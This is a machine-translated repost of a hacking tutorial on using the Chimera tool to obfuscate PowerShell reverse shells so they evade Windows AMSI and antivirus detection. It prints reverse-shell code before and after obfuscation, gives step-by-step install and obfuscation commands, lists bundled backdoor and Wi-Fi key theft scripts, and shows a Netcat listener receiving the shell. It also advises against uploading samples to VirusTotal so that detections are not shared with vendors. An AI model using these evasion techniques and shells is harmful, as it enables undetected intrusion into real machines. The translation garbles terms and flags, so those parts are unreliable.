قالب وردپرس درنا توس
Home / Tips and Tricks / How to bypass VirusTotal & AMSI detection signatures with chimera «Zero Byte :: WonderHowTo

How to bypass VirusTotal & AMSI detection signatures with chimera «Zero Byte :: WonderHowTo



Microsoft’s built-in antimalware solution does its best to prevent common attacks. Unfortunately for Windows 10 users, avoiding detection requires almost no effort at all. An attacker armed with this knowledge will easily bypass security software with any number of tools.

Because Microsoft’s antimalware solution is Windows 10’s first defense, it is the subject of very excellent security research. This article gives a brief introduction to how attackers will avoid it completely.

What is Antimalware Scan Interface (AMSI)?

The backbone of Microsoft̵

7;s antimalware, introduced in Windows 10, is the Windows Antimalware Scan Interface, or AMSI. Antivirus software, including Windows Defender, can call its set of APIs to request a scan of malware, scripts, and other content. To describe it briefly, let’s look at Microsoft’s definition:

Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to be integrated with any antimalware product available on a machine. AMSI provides enhanced malware for your end users and their data, applications, and workloads.

In the screenshot below, the attacker downloads a script (“shell.ps1”) that contains unnecessary code to directly invoke a connection to a remote server. When you try to run PowerShell scripts in this way, AMSI uses signature-based detection to identify malicious activity.

Below is a picture of the same script that is used after dark. Windows 10 has no problem running it. An arbitrary message is printed in the terminal when a connection is established to the attacker’s server.

How Chimera works

Chimera is a PowerShell confusion script that I created to bypass Microsoft’s AMSI and commercial antivirus solutions. It fuses malicious PowerShell scripts that are known to trigger antivirus software and uses simple string replacement and variable joining to avoid common detection signatures. Below is an example of Chimera at work.

The following is an excerpt of Invoke-PowerShellTcp.ps1, the same “shell.ps1” script that previously triggered AMSI.

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

VirusTotal reports 25 discoveries of the script (shown below). This is not surprising, since Invoke-PowerShellTcp.ps1 is extremely popular.

Here is the same excerpt after being processed by Chimera:

# Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.
          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.

  # Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.
           # Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.
   # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.
           $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.
            $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
   # An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.

VirusTotal reports 0 discoveries of the obscured version.

While I have uploaded a sample to VirusTotal, this is a very bad practice. As stated in its privacy policy:

All partners receive samples that their antivirus engines did not detect as potentially harmful if the same sample was detected as harmful by at least one other partner’s antivirus engine. This information sharing helps to correct potential vulnerabilities in the security industry.

In simpler terms, if only one antivirus engine detects a file created by Chimera, the file is distributed to over 75 antivirus companies. So do not upload files – created by any obscuration tool – to VirusTotal. Instead, use a local, offline Windows 10 VM with antivirus solutions installed. This way, if a file is detected, it will not be distributed to all major security companies on the planet.

Step 1: Clone the Chimera Repository

To get started with Chimera, use the following command to update the APT repository and install the dependencies that Chimera needs to function properly.

~$ sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git

[sudo] password for user:
Hit:1 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
coreutils is already the newest version (8.30-3+b1).
curl is already the newest version (7.68.0-1+b1).
curl set to manually installed.
gawk is already the newest version (1:5.0.1+dfsg-1).
gawk set to manually installed.
grep is already the newest version (3.4-1).
libc-bin is already the newest version (2.31-2).
perl is already the newest version (5.30.3-4).
sed is already the newest version (4.7-1).
xxd is already the newest version (2:8.2.0716-3).
The following additional packages will be installed:
   libjq1 (1.6-1)
   libonig5 (6.9.5-2)
The following NEW packages will be installed:
   jq (1.6-1)
   libjq1 (1.6-1)
   libonig5 (6.9.5-2)
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 378 kB of archives.

Then clone my Chimera archive with git clone command. I put it in my / opt / chimera directory as below.

~$ sudo git clone https://github.com/tokyoneon/chimera /opt/chimera

Cloning into '/opt/chimera'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 16 (delta 0), reused 16 (delta 0), pack-reused 0
Unpacking objects: 100% (16/16), 805.04 KiB | 1.79 MiB/s, done.

Next, recursive (-R) change the ownership of the directory to make the files available without root privileges.

~$ sudo chown $USER:$USER -R /opt/chimera/

Change now (CD) into the new / opt / chimera catalog.

~$ cd /opt/chimera/

And raise the permissions for chimera.sh script to allow driving in Kali.

/opt/chimera$ sudo chmod +x chimera.sh

Finally, to see available options, run Chimera with –help argument.

/opt/chimera$ ./chimera.sh --help

    ░ ./chimera --file powershell.ps1 --all --output /tmp/payload.ps1

  files:
    -f, --file          powershell file.ps1 to obfuscate
    -o, --output        override default output file location

  options:
    -a, --all           same as: -l 0 -v -t -c -i -p -h -s -b -j -k -e
    -l, --level         level of string manipulation (0=random,1=low,
                        2=med,3=high,4=higher,5=insane. default: 0)
    -v, --variables     replace variables with arbitrary strings,
                        use -v  to utilize
                        custom wordlist as variable name substitutions
    -t, --typedata      replace data types with arbitrary strings (e.g.,
                        System.IO.StreamWriter). use -t  to
                        include more
    -c, --comments      replace comments with arbitrary strings
                        use -c  to utillized custom
                        text instead of random strings
    -i, --insert        insert arbitrary comments into every line
    -h, --hex           convert ip addresses to hexidecimal values
    -s, --string        obfuscate provided strings, use -s 
    -b, --backticks     insert backticks into provided string, e.g., ne`w`-OB`je`cT
    -j, --functions     replace function names with arbitrary strings
    -d, --decimal       convert obfuscated payload to decimal format
                        improves AMSI evasion; increases AV detection
    -g, --nishang       remove nishang-specific characteristics
    -k, --keywords      search obfuscated output for words that may trigger
                        AV/VT. By default searches for common words (backdoor,
                        payload,nishang), use -k  to include more
    -r, --random        randomize character punctuation
    -p, --prepend       prepend random number of spaces to lines

  misc:
    -e, --examine       preview snippets of output file contents
    -q, --quiet         supress non-essential messages
    -z, --no-art        if you hate awesome ascii art
        --help          you're looking at it

Step 2: Darken a PowerShell script

The scales / catalog contain several Nishang scripts and some generic ones. All have been tested and work. However, there is nothing to say how untested scripts will be reproduced with Chimera. It is recommended to use only the included shells.

/opt/chimera$ ls -laR shells/

shells/:
total 60
-rwxrwx--- 1 user user 1727 Aug 29 22:02 generic1.ps1
-rwxrwx--- 1 user user 1433 Aug 29 22:02 generic2.ps1
-rwxrwx--- 1 user user  734 Aug 29 22:02 generic3.ps1
-rwxrwx--- 1 user user 4170 Aug 29 22:02 Invoke-PowerShellIcmp.ps1
-rwxrwx--- 1 user user  281 Aug 29 22:02 Invoke-PowerShellTcpOneLine.ps1
-rwxrwx--- 1 user user 4404 Aug 29 22:02 Invoke-PowerShellTcp.ps1
-rwxrwx--- 1 user user  594 Aug 29 22:02 Invoke-PowerShellUdpOneLine.ps1
-rwxrwx--- 1 user user 5754 Aug 29 22:02 Invoke-PowerShellUdp.ps1
drwxr-xr-x 2 user user 4096 Aug 30 18:53 misc
-rwxrwx--- 1 user user  616 Aug 29 22:02 powershell_reverse_shell.ps1

shells/misc:
total 36
-rwxrwx--- 1 user user 1757 Aug 12 19:53 Add-RegBackdoor.ps1
-rwxrwx--- 1 user user 3648 Aug 12 19:53 Get-Information.ps1
-rwxrwx--- 1 user user  672 Aug 12 19:53 Get-WLAN-Keys.ps1
-rwxrwx--- 1 user user 4430 Aug 28 23:31 Invoke-PortScan.ps1
-rwxrwx--- 1 user user 6762 Aug 29 00:27 Invoke-PoshRatHttp.ps1

Before using the scripts, change the hard-coded IP addresses (192.168.56.101) to your Kali address. To find your internal IP address, use ip -ca and look for the 192.168.XX address. If you do not see any of these, your Kali system is probably configured with NAT. You want to turn off the virtual machine and use a host configuration that is host only.

/opt/chimera$ sed -i 's/192.168.56.101//g' shells/*.ps1

The default port with all scripts is 4444. Use and again to change them if necessary.

/opt/chimera$ sed -i 's/4444//g' shells/*.ps1

Now use the following command to obscure one of the available scripts with Chimera.

/opt/chimera$ ./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -o /tmp/chimera.ps1 -g -v -t -j -i -c -h -s -b -e

 _____________________________________________________

  ░░░░░░ ░░   ░░ ░░ ░░░    ░░░ ░░░░░░░ ░░░░░░   ░░░░░
 ▒▒      ▒▒   ▒▒ ▒▒ ▒▒▒▒  ▒▒▒▒ ▒▒      ▒▒   ▒▒ ▒▒   ▒▒
 ▓▓      ▓▓▓▓▓▓▓ ▓▓ ▓▓ ▓▓▓▓ ▓▓ ▓▓▓▓▓   ▓▓▓▓▓▓  ▓▓▓▓▓▓▓
 ██      ██   ██ ██ ██  ██  ██ ██      ██   ██ ██   ██
  ██████ ██   ██ ██ ██      ██ ███████ ██   ██ ██   ██
 _____________________________________________________

 ░ by @tokyoneon_

A lot happens in the command. I summarize each argument briefly, but review the user guide for an in-depth explanation and cheatsheet for example. Also remember to use –help for broader descriptions.

  • -f: Input file.
  • -The: The output file.
  • -g: Omit several Nishang-specific features from the script.
  • -v: Replace variable name.
  • -t: Replace data types.
  • -j: Replace function name.
  • -in: Insert arbitrary comments in each line.
  • -c: Replace comments with arbitrary data.
  • -hrs: Convert IP addresses to hexadecimal format.
  • -s: Replace different strings.
  • -b: Backtick strings where possible.
  • -e: Examine the obscured file when the process is complete.

Step 3: Get a shell

In a new terminal, start a Netcat listener to receive incoming connections. Be sure to always use -v because some scripts do not provide a shell prompt when a new connection is established.

~$ nc -v -l -p 4444

listening on [any] 4444 ...

Move chimera.ps1 file from Kali to a local Windows 10 machine. Then open a PowerShell terminal and run the file with the following command.

PS> powershell.exe -ep bypass C:pathtochimera.ps1

Back in Kali nc the terminal will produce the following output – without any complaints from AMSI.

~$ nc -v -l -p 4444

listening on [any] 4444 ...
192.168.56.105: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 49725
Windows PowerShell running as user  on
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:Userstarget>

AMSI is good but not hacker safe

Creating defensive security tools is no easy feat. Microsoft’s Antimalware Scan Interface is a perfect example of this. A motivated attacker always finds a way to slip past security. When it comes to Chimera, it just breaks strings into many pieces and reconstructs them as variables. Other projects such as Invoke-Obfuscation take escape to a masterful level.

Follow me on Twitter @tokyoneon_ and GitHub to keep track of my current projects. And for questions and concerns, leave a comment or ping me on Twitter.

Want To Get Into The Gift Basket Business? Start your career with white-hat hacking with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get more than 60 hours of training from ethical hacking professionals.

Buy now (90% off)>

Cover photo, screenshots and GIFs of tokyoneon / Zero Replacement




Source link